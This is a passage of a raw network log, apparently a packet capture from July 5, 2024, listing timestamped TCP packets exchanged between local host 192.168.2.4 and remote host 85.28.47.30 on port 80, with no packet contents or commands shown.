                                                                Jul 5, 2024 04:36:06.552470922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552489042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552500010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552510023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552516937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552520990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552531004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552535057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552539110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552561998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552586079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552618027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552627087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552637100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552649021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552658081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552661896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552669048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552675009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552699089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552711010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552753925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552764893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552776098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552787066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552798033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552798033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552804947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552819014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552836895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552859068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552881956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552895069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.552925110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.552937031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.553039074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.553050995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.553077936 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.553090096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.553189039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.553199053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.553227901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.553240061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.639920950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640018940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640218019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640229940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640240908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640256882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640269041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640280962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640288115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640300035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640310049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640321970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640321970 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640332937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640342951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640355110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640356064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640368938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640379906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640383959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640397072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640408039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640408039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640419960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640428066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640443087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640454054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640455008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640465975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640476942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640480042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640495062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640500069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640507936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640518904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640527964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640532017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640543938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640552044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640557051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640573978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640582085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640588045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640595913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640600920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640625000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640628099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640642881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640646935 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640655041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640666962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640670061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640686989 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640695095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640700102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640718937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640739918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640818119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640830040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640839100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640852928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640860081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640865088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640877962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640888929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640891075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640904903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.640908957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640929937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.640953064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641096115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641105890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641115904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641125917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641136885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641141891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641153097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641155005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641166925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641186953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641196966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641200066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641211033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641220093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641232967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641235113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641254902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641258001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641266108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641275883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641288042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641294956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641298056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641309977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641320944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641320944 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641330957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641341925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641350985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641354084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641370058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641371965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641380072 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641383886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641396999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641402960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641424894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641444921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641448021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641460896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641469955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641480923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641489029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641508102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641515970 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641628981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641639948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641649961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641658068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641669035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641671896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641679049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641690016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641690969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641701937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641711950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641719103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641724110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641736984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641760111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.641932011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641942024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641952038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641963959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641973972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.641978979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642009020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642034054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642079115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642090082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642098904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642110109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642119884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642121077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642131090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642143011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642147064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642153978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642155886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642165899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642177105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642184019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642194033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642204046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642213106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642215014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642229080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642231941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642241001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642251015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642260075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642262936 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642271996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642282009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642288923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642292976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642304897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642307997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642317057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642328024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642333031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642343044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642345905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642358065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642374039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642380953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642409086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642412901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642426968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.642452955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.642462015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.731692076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.731713057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.731725931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.731738091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.731765985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.731786966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.731820107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.731832027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.731844902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.731859922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.731870890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.731894016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.731960058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.731970072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732004881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732012987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732053995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732075930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732091904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732120991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732125044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732136965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732147932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732160091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732165098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732183933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732198000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732215881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732230902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732244015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732254028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732260942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732269049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732289076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732306957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732317924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732328892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732340097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732350111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732367039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732383013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732412100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732424021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732434988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732453108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732453108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732465029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732465982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732491970 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732501030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732897043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732908010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732919931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732933044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732953072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732954025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732965946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732971907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732979059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.732991934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.732999086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733001947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733011961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733021975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733036995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733052015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733059883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733072042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733083010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733093023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733102083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733124018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733133078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733144999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733144999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733156919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733166933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733169079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733181953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733181953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733201981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733208895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733232975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733304977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733315945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733325958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733339071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733346939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733355045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733362913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733367920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733378887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733381987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733391047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733396053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733403921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733417034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733427048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733443022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733445883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733454943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733465910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733491898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733505011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733511925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733566999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733583927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733594894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733607054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733616114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733617067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733624935 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733629942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733640909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733648062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733654022 CEST804973085.28.47.30192.168.2.4
